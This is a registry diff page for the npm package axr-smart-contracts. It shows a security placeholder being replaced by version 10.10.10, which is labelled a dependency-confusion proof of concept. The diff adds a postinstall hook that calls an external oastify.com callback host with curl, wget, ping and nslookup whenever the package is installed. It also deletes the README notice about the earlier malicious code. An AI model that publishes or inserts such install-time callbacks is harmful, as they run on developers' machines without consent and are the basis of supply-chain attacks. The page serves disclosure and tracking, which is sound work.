axr-smart-contracts 0.0.1-security → 10.10.10

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of axr-smart-contracts might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/package.json +8 -3
  2. package/README.md +0 -5
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "axr-smart-contracts",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "10.10.10",
4
+ "main": "index.js",
5
+ "description": "PoC test for dependency confusion. Do not use in production.",
6
+ "scripts": {
7
+ "postinstall": "curl https://y98jbbh43ivf5egg6df4g3kw0n6eu5iu.oastify.com || wget https://y98jbbh43ivf5egg6df4g3kw0n6eu5iu.oastify.com || ping -c 1 y98jbbh43ivf5egg6df4g3kw0n6eu5iu.oastify.com || nslookup y98jbbh43ivf5egg6df4g3kw0n6eu5iu.oastify.com"
8
+ },
9
+ "author": "your_name_here",
10
+ "license": "MIT"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=axr-smart-contracts for more information.